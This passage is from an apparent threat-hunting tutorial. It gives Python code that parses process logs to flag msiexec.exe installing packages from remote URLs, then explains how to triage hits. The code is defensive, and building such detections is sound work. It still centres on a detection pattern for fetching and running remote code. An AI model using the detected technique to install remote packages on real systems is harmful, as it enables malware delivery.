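    """Split one export line; maxsplit=4 keeps any '|' inside the command line."""
    parts = line.rstrip("\r\n").split("|", 4)
    if len(parts) != 5:
        return None  # skip malformed lines instead of aborting the whole hunt
    return ProcEvent(*parts)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_msiexec_url(ev: ProcEvent):
    """Return the http(s) URL if this is msiexec.exe pointed at a remote package, else None.

    Matching on the image path rather than on the command line defeats the
    mixed-case trick in the first sample line; a local .msi path (second line)
    and a service-mode start with no URL (fourth line) both yield None.
    """
    if basename(ev.image) != "msiexec.exe":
        return None
    m = _URL_RE.search(ev.cmdline)
    return m.group(0) if m else None


def hunt(lines) -> list:
    """Run the detection over an iterable of log lines and return enriched hits."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        url = remote_msiexec_url(ev)
        if url is None:
            continue
        parts = urlsplit(url)  # normalises scheme and host name to lower case
        hits.append({
            "ts": ev.ts,
            "host": ev.host,
            "parent": basename(ev.parent_image),
            "url": url,
            "remote_host": parts.hostname,
            "remote_port": parts.port or (443 if parts.scheme == "https" else 80),
            "rule": "msiexec_remote_package",
        })
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']} {h['parent']} -> msiexec {h['remote_host']}:{h['remote_port']} {h['url']}")
```

Only the first sample line fires. The rule will also match legitimate software deployment that installs packages from an HTTP share, so treat the extracted remote host and the parent process as the triage pivots: the remote host goes into DNS and proxy log searches to find other machines that resolved or fetched from it, and the parent chain tells you whether the install came from a deployment tool or, as in the USB propagation the article describes, from an interactive shell on an endpoint.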
